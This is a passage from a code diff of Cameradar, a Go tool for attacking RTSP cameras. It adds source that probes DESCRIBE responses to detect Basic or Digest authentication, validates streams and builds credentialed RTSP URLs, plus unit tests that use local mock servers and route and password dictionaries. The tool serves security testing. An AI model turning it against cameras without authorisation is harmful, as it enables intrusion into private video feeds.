|
||||
|
||||
return nil, nil, err
|
||||
}
|
||||
|
||||
return nil, nil, fmt.Errorf("describe retries exhausted for %q: %w", urlStr, err)
|
||||
}
|
||||
|
||||
func (a Attacker) handleDescribeError(stream cameradar.Stream, urlStr string, err error) (cameradar.Stream, error) {
|
||||
var badStatus liberrors.ErrClientBadStatusCode
|
||||
if errors.As(err, &badStatus) && badStatus.Code == base.StatusServiceUnavailable {
|
||||
a.reporter.Debug(cameradar.StepValidateStreams, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > %d", urlStr, badStatus.Code))
|
||||
a.reporter.Progress(cameradar.StepValidateStreams, fmt.Sprintf("Stream unavailable for %s:%d (RTSP %d)",
|
||||
stream.Address.String(),
|
||||
stream.Port,
|
||||
badStatus.Code,
|
||||
))
|
||||
stream.Available = false
|
||||
return stream, nil
|
||||
}
|
||||
|
||||
a.reporter.Debug(cameradar.StepValidateStreams, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > error: %v", urlStr, err))
|
||||
|
||||
return stream, fmt.Errorf("performing describe request at %q: %w", urlStr, err)
|
||||
}
|
||||
|
||||
func (a Attacker) handleSetupError(stream cameradar.Stream, urlStr string, err error) (cameradar.Stream, error) {
|
||||
var badStatus liberrors.ErrClientBadStatusCode
|
||||
if errors.As(err, &badStatus) {
|
||||
a.reporter.Debug(cameradar.StepValidateStreams, fmt.Sprintf("SETUP %s RTSP/1.0 > %d", urlStr, badStatus.Code))
|
||||
stream.Available = badStatus.Code == base.StatusOK
|
||||
return stream, nil
|
||||
}
|
||||
|
||||
return stream, fmt.Errorf("performing setup request at %q: %w", urlStr, err)
|
||||
}
|
||||
|
||||
func (a Attacker) logDescribeResponse(urlStr string, res *base.Response) {
|
||||
if res == nil {
|
||||
return
|
||||
}
|
||||
a.reporter.Debug(cameradar.StepValidateStreams, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > %d", urlStr, res.StatusCode))
|
||||
}
|
||||
|
||||
func (a Attacker) logSetupResponse(urlStr string, res *base.Response) {
|
||||
if res == nil {
|
||||
return
|
||||
}
|
||||
a.reporter.Debug(cameradar.StepValidateStreams, fmt.Sprintf("SETUP %s RTSP/1.0 > %d", urlStr, res.StatusCode))
|
||||
}
|
||||
@@ -0,0 +1,388 @@
|
||||
package attack_test
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"sync"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/attack"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/base"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/headers"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNew(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
dict attack.Dictionary
|
||||
wantErr require.ErrorAssertionFunc
|
||||
}{
|
||||
{
|
||||
name: "rejects nil dictionary",
|
||||
dict: nil,
|
||||
wantErr: require.Error,
|
||||
},
|
||||
{
|
||||
name: "accepts dictionary",
|
||||
dict: testDictionary{
|
||||
routes: []string{"stream"},
|
||||
usernames: []string{"user"},
|
||||
passwords: []string{"pass"},
|
||||
},
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
attacker, err := attack.New(test.dict, 10*time.Millisecond, time.Second, ui.NopReporter{})
|
||||
test.wantErr(t, err)
|
||||
if err != nil {
|
||||
assert.NotNil(t, attacker)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_BasicAuth(t *testing.T) {
|
||||
addr, port := startRTSPServer(t, rtspServerConfig{
|
||||
allowedRoute: "stream",
|
||||
requireAuth: true,
|
||||
username: "user",
|
||||
password: "pass",
|
||||
authMethod: headers.AuthMethodBasic,
|
||||
})
|
||||
|
||||
dict := testDictionary{
|
||||
routes: []string{"stream"},
|
||||
usernames: []string{"user", "other"},
|
||||
passwords: []string{"pass", "bad"},
|
||||
}
|
||||
|
||||
testInterval := time.Millisecond
|
||||
testRequestTimeout := time.Second
|
||||
attacker, err := attack.New(dict, testInterval, testRequestTimeout, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
streams := []cameradar.Stream{{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}}
|
||||
|
||||
got, err := attacker.Attack(t.Context(), streams)
|
||||
require.NoError(t, err)
|
||||
require.Len(t, got, 1)
|
||||
|
||||
assert.True(t, got[0].RouteFound)
|
||||
assert.True(t, got[0].CredentialsFound)
|
||||
assert.True(t, got[0].Available)
|
||||
assert.Equal(t, cameradar.AuthBasic, got[0].AuthenticationType)
|
||||
assert.Equal(t, "user", got[0].Username)
|
||||
assert.Equal(t, "pass", got[0].Password)
|
||||
assert.Contains(t, got[0].Routes, "stream")
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_AuthVariants(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
config rtspServerConfig
|
||||
dict testDictionary
|
||||
wantAuthType cameradar.AuthType
|
||||
wantRoute bool
|
||||
wantCreds bool
|
||||
wantAvail bool
|
||||
wantErr require.ErrorAssertionFunc
|
||||
errContains string
|
||||
}{
|
||||
{
|
||||
name: "no authentication",
|
||||
config: rtspServerConfig{
|
||||
allowedRoute: "stream",
|
||||
requireAuth: false,
|
||||
authMethod: headers.AuthMethodBasic,
|
||||
},
|
||||
dict: testDictionary{
|
||||
routes: []string{"stream"},
|
||||
},
|
||||
wantAuthType: cameradar.AuthNone,
|
||||
wantRoute: true,
|
||||
wantCreds: false,
|
||||
wantAvail: true,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "digest authentication",
|
||||
config: rtspServerConfig{
|
||||
allowedRoute: "stream",
|
||||
requireAuth: true,
|
||||
username: "user",
|
||||
password: "pass",
|
||||
authMethod: headers.AuthMethodDigest,
|
||||
},
|
||||
dict: testDictionary{
|
||||
routes: []string{"stream"},
|
||||
usernames: []string{"user"},
|
||||
passwords: []string{"pass"},
|
||||
},
|
||||
wantAuthType: cameradar.AuthDigest,
|
||||
wantRoute: true,
|
||||
wantCreds: true,
|
||||
wantAvail: true,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
addr, port := startRTSPServer(t, test.config)
|
||||
|
||||
attacker, err := attack.New(test.dict, 0, time.Second, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
streams := []cameradar.Stream{{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}}
|
||||
|
||||
got, err := attacker.Attack(t.Context(), streams)
|
||||
test.wantErr(t, err)
|
||||
|
||||
if test.errContains != "" {
|
||||
assert.ErrorContains(t, err, test.errContains)
|
||||
}
|
||||
|
||||
require.Len(t, got, 1)
|
||||
assert.Equal(t, test.wantAuthType, got[0].AuthenticationType)
|
||||
assert.Equal(t, test.wantRoute, got[0].RouteFound)
|
||||
assert.Equal(t, test.wantCreds, got[0].CredentialsFound)
|
||||
assert.Equal(t, test.wantAvail, got[0].Available)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_ValidationErrors(t *testing.T) {
|
||||
attacker, err := attack.New(testDictionary{routes: []string{"stream"}}, 0, time.Second, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
attacker attack.Attacker
|
||||
targets []cameradar.Stream
|
||||
wantErr string
|
||||
}{
|
||||
{
|
||||
name: "fails with no targets",
|
||||
attacker: attacker,
|
||||
targets: nil,
|
||||
wantErr: "no stream found",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
_, err := test.attacker.Attack(t.Context(), test.targets)
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, test.wantErr)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_ReturnsErrorWhenRouteMissing(t *testing.T) {
|
||||
addr, port := startRTSPServer(t, rtspServerConfig{
|
||||
allowedRoute: "stream",
|
||||
requireAuth: false,
|
||||
authMethod: headers.AuthMethodBasic,
|
||||
})
|
||||
|
||||
dict := testDictionary{
|
||||
routes: []string{"missing"},
|
||||
usernames: []string{"user"},
|
||||
passwords: []string{"pass"},
|
||||
}
|
||||
|
||||
attacker, err := attack.New(dict, 0, time.Second, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
streams := []cameradar.Stream{{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}}
|
||||
|
||||
got, err := attacker.Attack(t.Context(), streams)
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "validating streams")
|
||||
require.Len(t, got, 1)
|
||||
assert.False(t, got[0].RouteFound)
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_ReturnsErrorWhenCredentialsMissing(t *testing.T) {
|
||||
addr, port := startRTSPServer(t, rtspServerConfig{
|
||||
allowedRoute: "stream",
|
||||
requireAuth: true,
|
||||
username: "user",
|
||||
password: "pass",
|
||||
authMethod: headers.AuthMethodBasic,
|
||||
})
|
||||
|
||||
dict := testDictionary{
|
||||
routes: []string{"stream"},
|
||||
usernames: []string{"user"},
|
||||
passwords: []string{"wrong"},
|
||||
}
|
||||
|
||||
attacker, err := attack.New(dict, 0, time.Second, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
streams := []cameradar.Stream{{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}}
|
||||
|
||||
got, err := attacker.Attack(t.Context(), streams)
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "validating streams")
|
||||
require.Len(t, got, 1)
|
||||
assert.Equal(t, cameradar.AuthBasic, got[0].AuthenticationType)
|
||||
assert.False(t, got[0].CredentialsFound)
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_CredentialAttemptFails(t *testing.T) {
|
||||
reporter := &recordingReporter{}
|
||||
|
||||
addr, port := startRTSPServer(t, rtspServerConfig{
|
||||
allowedRoute: "stream",
|
||||
requireAuth: true,
|
||||
username: "user",
|
||||
password: "pass",
|
||||
authMethod: headers.AuthMethodBasic,
|
||||
failOnAuth: true,
|
||||
})
|
||||
|
||||
dict := testDictionary{
|
||||
routes: []string{"stream"},
|
||||
usernames: []string{"user"},
|
||||
passwords: []string{"pass"},
|
||||
}
|
||||
|
||||
attacker, err := attack.New(dict, 0, time.Second, reporter)
|
||||
require.NoError(t, err)
|
||||
|
||||
streams := []cameradar.Stream{{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}}
|
||||
|
||||
got, err := attacker.Attack(t.Context(), streams)
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "validating streams")
|
||||
require.Len(t, got, 1)
|
||||
assert.False(t, got[0].CredentialsFound)
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_AllowsDummyRoute(t *testing.T) {
|
||||
addr, port := startRTSPServer(t, rtspServerConfig{
|
||||
allowAll: true,
|
||||
requireAuth: false,
|
||||
authMethod: headers.AuthMethodBasic,
|
||||
})
|
||||
|
||||
dict := testDictionary{}
|
||||
|
||||
attacker, err := attack.New(dict, 0, time.Second, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
streams := []cameradar.Stream{{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}}
|
||||
|
||||
got, err := attacker.Attack(t.Context(), streams)
|
||||
require.NoError(t, err)
|
||||
require.Len(t, got, 1)
|
||||
assert.True(t, got[0].RouteFound)
|
||||
assert.Equal(t, []string{""}, got[0].Routes)
|
||||
assert.True(t, got[0].Available)
|
||||
}
|
||||
|
||||
func TestAttacker_Attack_ValidationFailsWhenSetupErrors(t *testing.T) {
|
||||
addr, port := startRTSPServer(t, rtspServerConfig{
|
||||
allowedRoute: "stream",
|
||||
requireAuth: false,
|
||||
authMethod: headers.AuthMethodBasic,
|
||||
setupStatus: base.StatusUnsupportedTransport,
|
||||
})
|
||||
|
||||
dict := testDictionary{
|
||||
routes: []string{"stream"},
|
||||
}
|
||||
|
||||
attacker, err := attack.New(dict, 0, time.Second, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
streams := []cameradar.Stream{{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}}
|
||||
|
||||
got, err := attacker.Attack(t.Context(), streams)
|
||||
require.NoError(t, err)
|
||||
require.Len(t, got, 1)
|
||||
assert.False(t, got[0].Available)
|
||||
assert.True(t, got[0].RouteFound)
|
||||
}
|
||||
|
||||
type testDictionary struct {
|
||||
routes []string
|
||||
usernames []string
|
||||
passwords []string
|
||||
}
|
||||
|
||||
func (d testDictionary) Routes() []string {
|
||||
return d.routes
|
||||
}
|
||||
|
||||
func (d testDictionary) Usernames() []string {
|
||||
return d.usernames
|
||||
}
|
||||
|
||||
func (d testDictionary) Passwords() []string {
|
||||
return d.passwords
|
||||
}
|
||||
|
||||
type recordingReporter struct {
|
||||
mu sync.Mutex
|
||||
debugMessages []string
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Start(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Done(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Progress(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Debug(_ cameradar.Step, message string) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.debugMessages = append(r.debugMessages, message)
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Error(cameradar.Step, error) {}
|
||||
|
||||
func (r *recordingReporter) Summary([]cameradar.Stream, error) {}
|
||||
|
||||
func (r *recordingReporter) Close() {}
|
||||
|
||||
func (r *recordingReporter) HasDebugContaining(value string) bool {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
for _, message := range r.debugMessages {
|
||||
if strings.Contains(message, value) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
@@ -0,0 +1,68 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/base"
|
||||
)
|
||||
|
||||
func (a Attacker) detectAuthMethods(ctx context.Context, targets []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
streams, err := runParallel(ctx, targets, a.detectAuthMethod)
|
||||
if err != nil {
|
||||
return streams, err
|
||||
}
|
||||
|
||||
for i := range streams {
|
||||
a.reporter.Progress(cameradar.StepDetectAuth, cameradar.ProgressTickMessage())
|
||||
|
||||
var authMethod string
|
||||
switch streams[i].AuthenticationType {
|
||||
case cameradar.AuthNone:
|
||||
authMethod = "no"
|
||||
case cameradar.AuthBasic:
|
||||
authMethod = "basic"
|
||||
case cameradar.AuthDigest:
|
||||
authMethod = "digest"
|
||||
case cameradar.AuthUnknown:
|
||||
authMethod = "unknown"
|
||||
default:
|
||||
authMethod = fmt.Sprintf("unknown (%d)", streams[i].AuthenticationType)
|
||||
}
|
||||
|
||||
a.reporter.Progress(cameradar.StepDetectAuth, fmt.Sprintf("Detected %s authentication for %s:%d", authMethod, streams[i].Address.String(), streams[i].Port))
|
||||
}
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func (a Attacker) detectAuthMethod(ctx context.Context, stream cameradar.Stream) (cameradar.Stream, error) {
|
||||
if ctx.Err() != nil {
|
||||
return stream, ctx.Err()
|
||||
}
|
||||
u, urlStr, err := buildRTSPURL(stream, stream.Route(), "", "")
|
||||
if err != nil {
|
||||
return stream, fmt.Errorf("building rtsp url: %w", err)
|
||||
}
|
||||
|
||||
statusCode, headers, err := a.probeDescribeHeaders(ctx, u, urlStr)
|
||||
if err != nil {
|
||||
a.reporter.Debug(cameradar.StepDetectAuth, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > error: %v", urlStr, err))
|
||||
stream.AuthenticationType = cameradar.AuthUnknown
|
||||
return stream, fmt.Errorf("performing describe request at %q: %w", urlStr, err)
|
||||
}
|
||||
|
||||
a.reporter.Debug(cameradar.StepDetectAuth, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > %d", urlStr, statusCode))
|
||||
values := headerValues(headers, "WWW-Authenticate")
|
||||
switch statusCode {
|
||||
case base.StatusOK:
|
||||
stream.AuthenticationType = cameradar.AuthNone
|
||||
case base.StatusUnauthorized:
|
||||
stream.AuthenticationType = authTypeFromHeaders(values)
|
||||
default:
|
||||
stream.AuthenticationType = cameradar.AuthUnknown
|
||||
}
|
||||
|
||||
return stream, nil
|
||||
}
|
||||
@@ -0,0 +1,207 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"fmt"
|
||||
"net"
|
||||
"net/netip"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/base"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/headers"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
type testDictionary struct {
|
||||
routes []string
|
||||
usernames []string
|
||||
passwords []string
|
||||
}
|
||||
|
||||
func (d testDictionary) Routes() []string {
|
||||
return d.routes
|
||||
}
|
||||
|
||||
func (d testDictionary) Usernames() []string {
|
||||
return d.usernames
|
||||
}
|
||||
|
||||
func (d testDictionary) Passwords() []string {
|
||||
return d.passwords
|
||||
}
|
||||
|
||||
func TestAuthTypeFromHeaders(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
values base.HeaderValue
|
||||
want cameradar.AuthType
|
||||
}{
|
||||
{
|
||||
name: "digest wins over basic",
|
||||
values: base.HeaderValue{
|
||||
headers.Authenticate{Method: headers.AuthMethodBasic, Realm: "cam"}.Marshal()[0],
|
||||
headers.Authenticate{Method: headers.AuthMethodDigest, Realm: "cam", Nonce: "nonce"}.Marshal()[0],
|
||||
},
|
||||
want: cameradar.AuthDigest,
|
||||
},
|
||||
{
|
||||
name: "basic auth",
|
||||
values: headers.Authenticate{Method: headers.AuthMethodBasic, Realm: "cam"}.Marshal(),
|
||||
want: cameradar.AuthBasic,
|
||||
},
|
||||
{
|
||||
name: "digest auth",
|
||||
values: headers.Authenticate{Method: headers.AuthMethodDigest, Realm: "cam", Nonce: "nonce"}.Marshal(),
|
||||
want: cameradar.AuthDigest,
|
||||
},
|
||||
{
|
||||
name: "unknown with empty values",
|
||||
values: nil,
|
||||
want: cameradar.AuthUnknown,
|
||||
},
|
||||
{
|
||||
name: "unknown with unsupported header",
|
||||
values: base.HeaderValue{"Bearer abc"},
|
||||
want: cameradar.AuthUnknown,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
assert.Equal(t, test.want, authTypeFromHeaders(test.values))
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestDetectAuthMethod(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
statusCode base.StatusCode
|
||||
headers base.Header
|
||||
want cameradar.AuthType
|
||||
}{
|
||||
{
|
||||
name: "no auth when status ok",
|
||||
statusCode: base.StatusOK,
|
||||
headers: base.Header{
|
||||
"WWW-Authenticate": headers.Authenticate{Method: headers.AuthMethodBasic, Realm: "cam"}.Marshal(),
|
||||
},
|
||||
want: cameradar.AuthNone,
|
||||
},
|
||||
{
|
||||
name: "basic auth on unauthorized",
|
||||
statusCode: base.StatusUnauthorized,
|
||||
headers: base.Header{
|
||||
"WWW-Authenticate": headers.Authenticate{Method: headers.AuthMethodBasic, Realm: "cam"}.Marshal(),
|
||||
},
|
||||
want: cameradar.AuthBasic,
|
||||
},
|
||||
{
|
||||
name: "digest auth on unauthorized",
|
||||
statusCode: base.StatusUnauthorized,
|
||||
headers: base.Header{
|
||||
"WWW-Authenticate": headers.Authenticate{Method: headers.AuthMethodDigest, Realm: "cam", Nonce: "nonce"}.Marshal(),
|
||||
},
|
||||
want: cameradar.AuthDigest,
|
||||
},
|
||||
{
|
||||
name: "unknown auth on unauthorized without www-authenticate",
|
||||
statusCode: base.StatusUnauthorized,
|
||||
headers: nil,
|
||||
want: cameradar.AuthUnknown,
|
||||
},
|
||||
{
|
||||
name: "unknown auth on other status",
|
||||
statusCode: base.StatusNotFound,
|
||||
headers: nil,
|
||||
want: cameradar.AuthUnknown,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
addr, port := startRTSPProbeServer(t, test.statusCode, test.headers)
|
||||
|
||||
attacker, err := New(testDictionary{}, 0, time.Second, ui.NopReporter{})
|
||||
require.NoError(t, err)
|
||||
|
||||
stream := cameradar.Stream{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
}
|
||||
|
||||
got, err := attacker.detectAuthMethod(t.Context(), stream)
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, test.want, got.AuthenticationType)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func startRTSPProbeServer(t *testing.T, statusCode base.StatusCode, headers base.Header) (netip.Addr, uint16) {
|
||||
t.Helper()
|
||||
|
||||
listener, err := net.Listen("tcp", "127.0.0.1:0")
|
||||
require.NoError(t, err)
|
||||
|
||||
t.Cleanup(func() {
|
||||
_ = listener.Close()
|
||||
})
|
||||
|
||||
go func() {
|
||||
conn, err := listener.Accept()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer conn.Close()
|
||||
|
||||
_ = conn.SetDeadline(time.Now().Add(time.Second))
|
||||
|
||||
reader := bufio.NewReader(conn)
|
||||
for {
|
||||
line, err := reader.ReadString('\n')
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
if strings.TrimSpace(line) == "" {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
statusText := statusTextFromCode(statusCode)
|
||||
|
||||
var builder strings.Builder
|
||||
_, _ = fmt.Fprintf(&builder, "RTSP/1.0 %d %s\r\n", statusCode, statusText)
|
||||
builder.WriteString("CSeq: 1\r\n")
|
||||
for key, values := range headers {
|
||||
for _, value := range values {
|
||||
_, _ = fmt.Fprintf(&builder, "%s: %s\r\n", key, value)
|
||||
}
|
||||
}
|
||||
builder.WriteString("Content-Length: 0\r\n\r\n")
|
||||
|
||||
_, _ = conn.Write([]byte(builder.String()))
|
||||
}()
|
||||
|
||||
tcpAddr, ok := listener.Addr().(*net.TCPAddr)
|
||||
require.True(t, ok)
|
||||
|
||||
return netip.MustParseAddr("127.0.0.1"), uint16(tcpAddr.Port)
|
||||
}
|
||||
|
||||
func statusTextFromCode(code base.StatusCode) string {
|
||||
switch code {
|
||||
case base.StatusOK:
|
||||
return "OK"
|
||||
case base.StatusUnauthorized:
|
||||
return "Unauthorized"
|
||||
case base.StatusNotFound:
|
||||
return "Not Found"
|
||||
default:
|
||||
return "Unknown"
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,187 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net"
|
||||
"net/textproto"
|
||||
"net/url"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/bluenviron/gortsplib/v5"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/base"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/headers"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/liberrors"
|
||||
)
|
||||
|
||||
func (a Attacker) newRTSPClient(u *base.URL) (*gortsplib.Client, error) {
|
||||
client := &gortsplib.Client{
|
||||
ReadTimeout: a.timeout,
|
||||
WriteTimeout: a.timeout,
|
||||
}
|
||||
client.Scheme = u.Scheme
|
||||
client.Host = u.Host
|
||||
|
||||
err := client.Start()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return client, nil
|
||||
}
|
||||
|
||||
func (a Attacker) describeStatus(u *base.URL) (base.StatusCode, error) {
|
||||
client, err := a.newRTSPClient(u)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
defer client.Close()
|
||||
|
||||
_, res, err := client.Describe(u)
|
||||
if err != nil {
|
||||
var badStatus liberrors.ErrClientBadStatusCode
|
||||
if errors.As(err, &badStatus) {
|
||||
return badStatus.Code, nil
|
||||
}
|
||||
return 0, err
|
||||
}
|
||||
if res == nil {
|
||||
return 0, errors.New("no response received")
|
||||
}
|
||||
|
||||
return res.StatusCode, nil
|
||||
}
|
||||
|
||||
// probeDescribeHeaders performs a manual DESCRIBE request and returns the status code and headers.
|
||||
//
|
||||
// NOTE: We do not use gortsplib here because it does not expose response headers when the status code is 401 Unauthorized,
|
||||
// which is exactly what we need in order to detect authentication methods.
|
||||
func (a Attacker) probeDescribeHeaders(ctx context.Context, u *base.URL, urlStr string) (base.StatusCode, base.Header, error) {
|
||||
dialer := &net.Dialer{Timeout: a.timeout}
|
||||
conn, err := dialer.DialContext(ctx, "tcp", u.Host)
|
||||
if err != nil {
|
||||
return 0, nil, err
|
||||
}
|
||||
defer conn.Close()
|
||||
|
||||
deadline, ok := ctx.Deadline()
|
||||
if !ok {
|
||||
deadline = time.Now().Add(a.timeout)
|
||||
}
|
||||
|
||||
err = conn.SetDeadline(deadline)
|
||||
if err != nil {
|
||||
return 0, nil, err
|
||||
}
|
||||
|
||||
request := fmt.Sprintf(
|
||||
"DESCRIBE %s RTSP/1.0\r\nCSeq: 1\r\nUser-Agent: cameradar\r\nAccept: application/sdp\r\nHost: %s\r\n\r\n",
|
||||
urlStr,
|
||||
u.Host,
|
||||
)
|
||||
_, err = conn.Write([]byte(request))
|
||||
if err != nil {
|
||||
return 0, nil, err
|
||||
}
|
||||
|
||||
reader := textproto.NewReader(bufio.NewReader(conn))
|
||||
statusLine, err := reader.ReadLine()
|
||||
if err != nil {
|
||||
return 0, nil, err
|
||||
}
|
||||
fields := strings.Fields(statusLine)
|
||||
if len(fields) < 2 {
|
||||
return 0, nil, fmt.Errorf("invalid RTSP status line: %q", statusLine)
|
||||
}
|
||||
|
||||
code, err := strconv.Atoi(fields[1])
|
||||
if err != nil {
|
||||
return 0, nil, fmt.Errorf("parsing RTSP status code %q: %w", fields[1], err)
|
||||
}
|
||||
|
||||
mimeHeader, err := reader.ReadMIMEHeader()
|
||||
if err != nil {
|
||||
return 0, nil, err
|
||||
}
|
||||
|
||||
headers := make(base.Header)
|
||||
for key, values := range mimeHeader {
|
||||
headers[key] = append(base.HeaderValue(nil), values...)
|
||||
}
|
||||
|
||||
return base.StatusCode(code), headers, nil
|
||||
}
|
||||
|
||||
func authTypeFromHeaders(values base.HeaderValue) cameradar.AuthType {
|
||||
if len(values) == 0 {
|
||||
return cameradar.AuthUnknown
|
||||
}
|
||||
|
||||
var hasBasic bool
|
||||
var hasDigest bool
|
||||
|
||||
for _, value := range values {
|
||||
var authHeader headers.Authenticate
|
||||
err := authHeader.Unmarshal(base.HeaderValue{value})
|
||||
if err != nil {
|
||||
lower := strings.ToLower(value)
|
||||
hasDigest = hasDigest || strings.Contains(lower, "digest")
|
||||
hasBasic = hasBasic || strings.Contains(lower, "basic")
|
||||
continue
|
||||
}
|
||||
|
||||
switch authHeader.Method {
|
||||
case headers.AuthMethodDigest:
|
||||
hasDigest = true
|
||||
case headers.AuthMethodBasic:
|
||||
hasBasic = true
|
||||
}
|
||||
}
|
||||
|
||||
if hasDigest {
|
||||
return cameradar.AuthDigest
|
||||
}
|
||||
if hasBasic {
|
||||
return cameradar.AuthBasic
|
||||
}
|
||||
return cameradar.AuthUnknown
|
||||
}
|
||||
|
||||
func headerValues(header base.Header, name string) base.HeaderValue {
|
||||
if header == nil {
|
||||
return nil
|
||||
}
|
||||
for key, values := range header {
|
||||
if strings.EqualFold(key, name) {
|
||||
return values
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func buildRTSPURL(stream cameradar.Stream, route, username, password string) (*base.URL, string, error) {
|
||||
host := net.JoinHostPort(stream.Address.String(), strconv.Itoa(int(stream.Port)))
|
||||
path := "/" + strings.TrimLeft(strings.TrimSpace(route), "/") // Ensure path starts with a single "/"
|
||||
|
||||
u := &url.URL{
|
||||
Scheme: "rtsp",
|
||||
Host: host,
|
||||
Path: path,
|
||||
}
|
||||
if username != "" || password != "" {
|
||||
u.User = url.UserPassword(username, password)
|
||||
}
|
||||
|
||||
urlStr := u.String()
|
||||
parsed, err := base.ParseURL(urlStr)
|
||||
if err != nil {
|
||||
return nil, "", err
|
||||
}
|
||||
|
||||
return parsed, urlStr, nil
|
||||
}
|
||||
@@ -0,0 +1,166 @@
|
||||
package attack_test
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"net"
|
||||
"net/netip"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/bluenviron/gortsplib/v5"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/auth"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/base"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/description"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/format"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/headers"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/liberrors"
|
||||
